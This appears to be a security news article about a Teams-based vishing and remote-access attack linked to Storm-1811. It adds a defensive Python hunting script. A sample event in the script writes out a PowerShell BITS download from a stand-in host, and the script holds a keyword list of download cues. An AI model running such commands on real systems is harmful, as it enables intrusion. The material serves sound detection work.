Researchers have documented a sophisticated multi-stage attack in which threat actors leverage Microsoft Teams to deliver malicious payloads, establishing persistence and remote access to corporate networks.
This new attack vector exploits Teams’ perceived security as an internal business application, allowing attackers to bypass traditional email security controls.
Security firm Ontinue’s Cyber Defence Centre recently documented an incident in which attackers compromised systems using a combination of social engineering, vishing (voice phishing), and legitimate remote access tools.
Attack Methodology and Sophisticated Chain
The attack began with the threat actor sending a Microsoft Teams message to the target containing a malicious PowerShell command.
“The actor transmitted a PowerShell command directly via the Teams message and also utilised the QuickAssist remote tool to gain access to the target device remotely,” investigators noted.
This initial access phase exploited users’ trust in team communications, particularly when the threat actor impersonated IT support personnel.
The observed PowerShell command executed from the target endpoint facilitated the download of first-stage malware:
Upon execution, the attack leveraged DLL sideloading techniques with a legitimate signed TeamViewer.exe binary loading a malicious TV.dll module.
This advanced technique helps bypass security controls as the initial executable appears legitimate and properly signed.
JavaScript Backdoor Establishes Command & Control
Analysis of the second-stage payload revealed a JavaScript-based backdoor executed via Node.js (renamed to hcmd.exe), which established a persistent connection to the attackers’ command-and-control infrastructure.
The backdoor included socket capabilities for remote connections and command execution:
This attack pattern aligns with techniques attributed to threat actor Storm-1811, known for leveraging vishing, Quick Assist, and social engineering tactics.
Microsoft has observed similar campaigns since mid-April 2024, in which attackers bombard victims with spam emails before calling while impersonating IT support staff.
Security researchers at Trend Micro have also documented comparable attacks distributing DarkGate malware through Teams voice calls, where victims were instructed to download remote access applications like AnyDesk.
Detection and Mitigation
The attack chain utilizes several MITRE ATT&CK techniques, including:
- T1105 – Ingress Tool Transfer
- T1656 – Impersonation
- T1219 – Remote Access Software
- T1218 – Signed Binary Proxy Execution
- T1197 – BITS Jobs
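As an added detection example (not code from Ontinue's report), the rules below score constructed Sysmon-style process-creation and image-load records for the behaviours described above: a Node.js runtime running under a renamed image such as hcmd.exe, PowerShell invoking a download or BITS transfer, and a signed TeamViewer.exe loading TV.dll from a user-writable directory. The field names, the sample events and the mapping of findings to ATT&CK IDs are this example's assumptions.

```python
import os

# Constructed Sysmon-like records for this example; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "process", "image": r"C:\Users\alice\AppData\Local\Temp\hcmd.exe",
     "original_filename": "node.exe", "cmdline": "hcmd.exe client.js"},
    {"host": "WS01", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_filename": "PowerShell.EXE",
     "cmdline": "powershell -ep bypass Start-BitsTransfer -Source http://example.invalid/s1.zip"},
    {"host": "WS01", "type": "image_load", "image": r"C:\Users\alice\AppData\Local\Temp\TeamViewer.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\TV.dll"},
    # Benign counterparts: a normal TeamViewer install and an unrenamed Node.js.
    {"host": "WS02", "type": "image_load", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "loaded": r"C:\Program Files\TeamViewer\TV.dll"},
    {"host": "WS02", "type": "process", "image": r"C:\Program Files\nodejs\node.exe",
     "original_filename": "node.exe", "cmdline": "node app.js"},
]

TRUSTED_DIRS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")
INGRESS_CUES = ("start-bitstransfer", "bitsadmin", "invoke-webrequest", "downloadfile")


def basename(path):
    """File name of a Windows path, lower-cased, independent of host OS."""
    return os.path.basename(path.replace("\\", "/")).lower()


def in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def classify(ev):
    """Return a list of (technique_tag, reason) findings for one event."""
    findings = []
    if ev["type"] == "process":
        img, orig = basename(ev["image"]), ev.get("original_filename", "").lower()
        if orig == "node.exe" and img != "node.exe":          # PE OriginalFileName vs on-disk name
            findings.append(("T1036", f"Node.js runtime running as renamed image {img}"))
        if img == "powershell.exe" and any(c in ev["cmdline"].lower() for c in INGRESS_CUES):
            findings.append(("T1105/T1197", "PowerShell download or BITS transfer cue"))
    elif ev["type"] == "image_load":
        if (basename(ev["image"]) == "teamviewer.exe" and basename(ev["loaded"]) == "tv.dll"
                and not in_trusted_dir(ev["loaded"])):
            findings.append(("T1218", f"signed TeamViewer.exe sideloading {ev['loaded']}"))
    return findings


def hunt(events):
    """Group findings per host so the whole multi-stage chain shows up in one view."""
    by_host = {}
    for ev in events:
        for finding in classify(ev):
            by_host.setdefault(ev["host"], []).append(finding)
    return by_host
```

Running `hunt(SAMPLE_EVENTS)` reports three findings on WS01 and nothing on WS02, where the same binaries live in their expected install paths.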
Security experts recommend that organizations block or uninstall Quick Assist and similar remote monitoring tools if they are not required. Additionally, organizations should consider disabling external connections to their Teams environment to prevent such attacks.
Microsoft has announced plans to implement alerts in Quick Assist to warn users of potential tech support scams.
As more people use collaboration tools like Microsoft Teams, organizations need to recognise that these tools are themselves an attack surface. This means putting strong security controls in place and providing training that helps users recognise impersonation and unsolicited remote-access requests.